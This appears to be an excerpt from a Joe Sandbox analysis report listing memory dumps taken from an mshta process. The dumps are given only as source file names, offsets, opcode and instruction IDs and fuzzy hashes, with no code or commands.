                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383159592.000000000C112000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C113000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c112000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: R_
                                                                                                                                                                                                                                • API String ID: 0-847274316
                                                                                                                                                                                                                                • Opcode ID: 742df8e7a4cd762d49dcf4df1b6c615d2888a790dba9c112387ad62a0183f81d
                                                                                                                                                                                                                                • Instruction ID: 13970f01fb6fd90a5b45eabbfc3a6b41547cbb6a88db53d815d1ce5288b1e821
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 742df8e7a4cd762d49dcf4df1b6c615d2888a790dba9c112387ad62a0183f81d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88428D31B04318DFEB14CB59C845BBDB7A1AB45314F99423ADE25AB3A8D77CC884CB91
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382552520.000000000C125000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C125000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c125000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: S!
                                                                                                                                                                                                                                • API String ID: 0-2619739190
                                                                                                                                                                                                                                • Opcode ID: 52c32282bf6343a2b2290f565dd5d067d73f679a7d449b6888fe38d047fabfd3
                                                                                                                                                                                                                                • Instruction ID: b56231e42295c017639d7c39aa8d8d5c6f429ff489712d36a4b254e265233dd2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52c32282bf6343a2b2290f565dd5d067d73f679a7d449b6888fe38d047fabfd3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE31C774A04314CFCB14CF59D884BA9FBF2BF95325F04826AE8599B381D774D815CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11E000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 683772904ec633c9a8e268d641048b767ba2e7add2c0fda5d273efc6337e9865
                                                                                                                                                                                                                                • Instruction ID: b3622c551375c1885d4aa3c00d4220e1314866b21aa650d06d9e0558cef444f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 683772904ec633c9a8e268d641048b767ba2e7add2c0fda5d273efc6337e9865
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA52E331A04309DFDB18CFD4D895AADB3E2EF4A354F258629EE06AB340D778D846CB51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 683772904ec633c9a8e268d641048b767ba2e7add2c0fda5d273efc6337e9865
                                                                                                                                                                                                                                • Instruction ID: b3622c551375c1885d4aa3c00d4220e1314866b21aa650d06d9e0558cef444f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 683772904ec633c9a8e268d641048b767ba2e7add2c0fda5d273efc6337e9865
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA52E331A04309DFDB18CFD4D895AADB3E2EF4A354F258629EE06AB340D778D846CB51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382777818.000000000C126000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C126000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c125000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e1c98eb89ba7cbc0d1f5fef6c4710e5606e93c5ba6b56e46592156d282024d7d
                                                                                                                                                                                                                                • Instruction ID: c78e9e00cd111f25b67c30824f2eb76bdaec2a2e28459b506b5f55fc099e0897
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1c98eb89ba7cbc0d1f5fef6c4710e5606e93c5ba6b56e46592156d282024d7d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9420638B00315DFEB14CF99C890BAAB7E1EB49354F158259EA15A73C1C3B5D8A1CBE1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382777818.000000000C126000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C127000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c125000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e1c98eb89ba7cbc0d1f5fef6c4710e5606e93c5ba6b56e46592156d282024d7d
                                                                                                                                                                                                                                • Instruction ID: c78e9e00cd111f25b67c30824f2eb76bdaec2a2e28459b506b5f55fc099e0897
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1c98eb89ba7cbc0d1f5fef6c4710e5606e93c5ba6b56e46592156d282024d7d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9420638B00315DFEB14CF99C890BAAB7E1EB49354F158259EA15A73C1C3B5D8A1CBE1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382777818.000000000C126000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C125000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382552520.000000000C125000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c125000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 38f2044447d1c344842a54b3d14ba0a7003035da3fd8f6b000af2d9be9810af7
                                                                                                                                                                                                                                • Instruction ID: c78e9e00cd111f25b67c30824f2eb76bdaec2a2e28459b506b5f55fc099e0897
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38f2044447d1c344842a54b3d14ba0a7003035da3fd8f6b000af2d9be9810af7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9420638B00315DFEB14CF99C890BAAB7E1EB49354F158259EA15A73C1C3B5D8A1CBE1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382602564.000000000C12A000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C12A000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c125000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 81c4a9bfc2d2c403bab7fa08955ebf36cf73d491a4b537936f2c7f3497fb28d4
                                                                                                                                                                                                                                • Instruction ID: f7e7f4e4ff971271a11ad9cab1d22deb5291cdf8a8bb6944700ec7a99751e3d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81c4a9bfc2d2c403bab7fa08955ebf36cf73d491a4b537936f2c7f3497fb28d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1518638340728EBC314CF54C890E7AF3E5EF4A741B548259EA4AEF385D770E81297A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382602564.000000000C12A000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C125000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382552520.000000000C125000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c125000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3339840ef75ef2e939f397873b6754862eabb9de3000e360bafa1f1dfc4df804
                                                                                                                                                                                                                                • Instruction ID: f7e7f4e4ff971271a11ad9cab1d22deb5291cdf8a8bb6944700ec7a99751e3d4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3339840ef75ef2e939f397873b6754862eabb9de3000e360bafa1f1dfc4df804
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1518638340728EBC314CF54C890E7AF3E5EF4A741B548259EA4AEF385D770E81297A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8b566390cf0176f950e1243241fa3000b4126bd593605583592dc5b28a37688e
                                                                                                                                                                                                                                • Instruction ID: fc11275c56c61e1e51ba4e60a9394106f9fc2fa9a768a89ea134361248370baf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b566390cf0176f950e1243241fa3000b4126bd593605583592dc5b28a37688e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5312030300302DBDB16EF66E891BB1B3E5AF42355F1986A9FE589B781C779C882C751
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 64009df98090533162a30ea89ebd08541a64c142986f4925bcb90907fe5539b0
                                                                                                                                                                                                                                • Instruction ID: fc11275c56c61e1e51ba4e60a9394106f9fc2fa9a768a89ea134361248370baf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64009df98090533162a30ea89ebd08541a64c142986f4925bcb90907fe5539b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5312030300302DBDB16EF66E891BB1B3E5AF42355F1986A9FE589B781C779C882C751
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bbdd4b62dd0f2d87a4a4df05567338d7b83a4bbea0906f57122f2abe0973fa7b
                                                                                                                                                                                                                                • Instruction ID: cfb705ef31ff104db9572c21f2132cd193692fa3dc0548f34df2704f17e99f12
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbdd4b62dd0f2d87a4a4df05567338d7b83a4bbea0906f57122f2abe0973fa7b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7831F671744308DFDB108F59C881BA9B3E8EB46364F1442A8FEA59B790D37AEC50C7A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C116000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bbdd4b62dd0f2d87a4a4df05567338d7b83a4bbea0906f57122f2abe0973fa7b
                                                                                                                                                                                                                                • Instruction ID: cfb705ef31ff104db9572c21f2132cd193692fa3dc0548f34df2704f17e99f12
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbdd4b62dd0f2d87a4a4df05567338d7b83a4bbea0906f57122f2abe0973fa7b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7831F671744308DFDB108F59C881BA9B3E8EB46364F1442A8FEA59B790D37AEC50C7A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 82d5f40ba964646a5980dc104d7ca4b27fd44fe1ba0bb85bd64033b3c52b6919
                                                                                                                                                                                                                                • Instruction ID: 52c0468ea6fe7452211a0fdd2d848fefccb08b7b2c0328dfb2273081cc1fcce1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82d5f40ba964646a5980dc104d7ca4b27fd44fe1ba0bb85bd64033b3c52b6919
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6312431904705DBDB96EF54E440AAAF7F1FF46354F15452AED0AE7200D738E491CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d89bf51914b9cf15015fe64f767434906d2a6ea4458497e2034ad97c54ceb10a
                                                                                                                                                                                                                                • Instruction ID: 52c0468ea6fe7452211a0fdd2d848fefccb08b7b2c0328dfb2273081cc1fcce1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d89bf51914b9cf15015fe64f767434906d2a6ea4458497e2034ad97c54ceb10a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6312431904705DBDB96EF54E440AAAF7F1FF46354F15452AED0AE7200D738E491CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6da4c3a8e42899a3a96dfc269155f0fb3049adb99a1a1de00d7c54b23c817466
                                                                                                                                                                                                                                • Instruction ID: 02ab41b3996c390149d7a857cc48dcc9282d75cf45db3a79186d257c6fbb467f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6da4c3a8e42899a3a96dfc269155f0fb3049adb99a1a1de00d7c54b23c817466
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C621BC74344308DFDB04CF69C991AAAB7D4EB46220F0442A8FE99DB352D735DC45CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C116000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6da4c3a8e42899a3a96dfc269155f0fb3049adb99a1a1de00d7c54b23c817466
                                                                                                                                                                                                                                • Instruction ID: 02ab41b3996c390149d7a857cc48dcc9282d75cf45db3a79186d257c6fbb467f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6da4c3a8e42899a3a96dfc269155f0fb3049adb99a1a1de00d7c54b23c817466
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C621BC74344308DFDB04CF69C991AAAB7D4EB46220F0442A8FE99DB352D735DC45CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 21c3bb805d085015fb894cde9637819b83e148e909913de03bc00b815b6f70b0
                                                                                                                                                                                                                                • Instruction ID: 85867c51584136dda8f935900414678b88bdef45037feb3935f1eb578245f1c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21c3bb805d085015fb894cde9637819b83e148e909913de03bc00b815b6f70b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7721E230B06704CBDB24CF55C994761BBE2AFC1316F28C279CE1A4A2C6C37A8883DB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C116000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 21c3bb805d085015fb894cde9637819b83e148e909913de03bc00b815b6f70b0
                                                                                                                                                                                                                                • Instruction ID: 85867c51584136dda8f935900414678b88bdef45037feb3935f1eb578245f1c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21c3bb805d085015fb894cde9637819b83e148e909913de03bc00b815b6f70b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7721E230B06704CBDB24CF55C994761BBE2AFC1316F28C279CE1A4A2C6C37A8883DB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C118000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dcec4df94f69880287f5548e1777e74d0da2382659a5a4cbc0b3c2a60e33031f
                                                                                                                                                                                                                                • Instruction ID: 85867c51584136dda8f935900414678b88bdef45037feb3935f1eb578245f1c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcec4df94f69880287f5548e1777e74d0da2382659a5a4cbc0b3c2a60e33031f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7721E230B06704CBDB24CF55C994761BBE2AFC1316F28C279CE1A4A2C6C37A8883DB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383020198.000000000C118000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11A000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dcec4df94f69880287f5548e1777e74d0da2382659a5a4cbc0b3c2a60e33031f
                                                                                                                                                                                                                                • Instruction ID: 85867c51584136dda8f935900414678b88bdef45037feb3935f1eb578245f1c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcec4df94f69880287f5548e1777e74d0da2382659a5a4cbc0b3c2a60e33031f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7721E230B06704CBDB24CF55C994761BBE2AFC1316F28C279CE1A4A2C6C37A8883DB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383207381.000000000C110000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C110000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c110000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a8275e92c8518877f3c88aef8907fb7151423ae85897136c4f768913d2a2d62d
                                                                                                                                                                                                                                • Instruction ID: 4cb89c802ba282754314c6e0758fa02d0ce950adc85b0eafc1be75c9e3de98fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8275e92c8518877f3c88aef8907fb7151423ae85897136c4f768913d2a2d62d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC212670B44308EFD354CF88D891EBAB7A0EB89744F04816AFE0A9B341C774C890CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C115000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.25382683998.000000000C115000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 99ffd107aa59191c396ad6140736c080803581f5e6b49d6462c68266f697acc4
                                                                                                                                                                                                                                • Instruction ID: 4055fa7681194cd4e64ffb0ac25fd92cfa0dec0b010a8ff800966b2c12dade74
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99ffd107aa59191c396ad6140736c080803581f5e6b49d6462c68266f697acc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8411AC357002128BDB25DF4AD490BA5F3E5EF84320F1986A9ED588B391D339ED52C781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25382896926.000000000C11D000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C11D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c115000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4e3d4f009582a687b311da1e3c70e2b6b6476784e32b116b98cc5b161f5f441d
                                                                                                                                                                                                                                • Instruction ID: 4055fa7681194cd4e64ffb0ac25fd92cfa0dec0b010a8ff800966b2c12dade74
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e3d4f009582a687b311da1e3c70e2b6b6476784e32b116b98cc5b161f5f441d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8411AC357002128BDB25DF4AD490BA5F3E5EF84320F1986A9ED588B391D339ED52C781
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383159592.000000000C112000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C112000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c112000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a39b18b0d38c7f9988e8be23b6b34573c4c949288391c70e7530e44e9fdcf9db
                                                                                                                                                                                                                                • Instruction ID: 3c1dfcdd264540ef956c4ca114191886a80ea52bd1c157de804b819f5ddcaa4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a39b18b0d38c7f9988e8be23b6b34573c4c949288391c70e7530e44e9fdcf9db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61016971304210DFCB14CF5ADC80AAAB7E4EB4A250F0485A9ED989B212C734DC048BA2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383207381.000000000C110000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C110000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c110000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0429fb549640cc5980dffcacfde69c976766a8dab7af311534e8df9a280051d8
                                                                                                                                                                                                                                • Instruction ID: 633e84b01f94d441121ed8303e083396de8737ac7bbb31f691157be1993a0e98
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0429fb549640cc5980dffcacfde69c976766a8dab7af311534e8df9a280051d8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EF0A771A483499EE720CA95DC92AAAFBA8AF88220F488197ED458B252C75944D4C792
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383159592.000000000C112000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C112000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_c112000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ba7bfdcc4f63456ba48f80254ab7390b0e292084408aa9a4e25eaedad9c239b0
                                                                                                                                                                                                                                • Instruction ID: 14613cb0ca87c3f31ef406e88fb5e2bc1b719ab1310f020238e86d6f6ad1fe7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba7bfdcc4f63456ba48f80254ab7390b0e292084408aa9a4e25eaedad9c239b0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39E0612160C2D8DCE716D26568157E8FF145B03648F8A41F3DA7457163975D48C883A3
                                                                                                                                                                                                                                Memory Dump Source
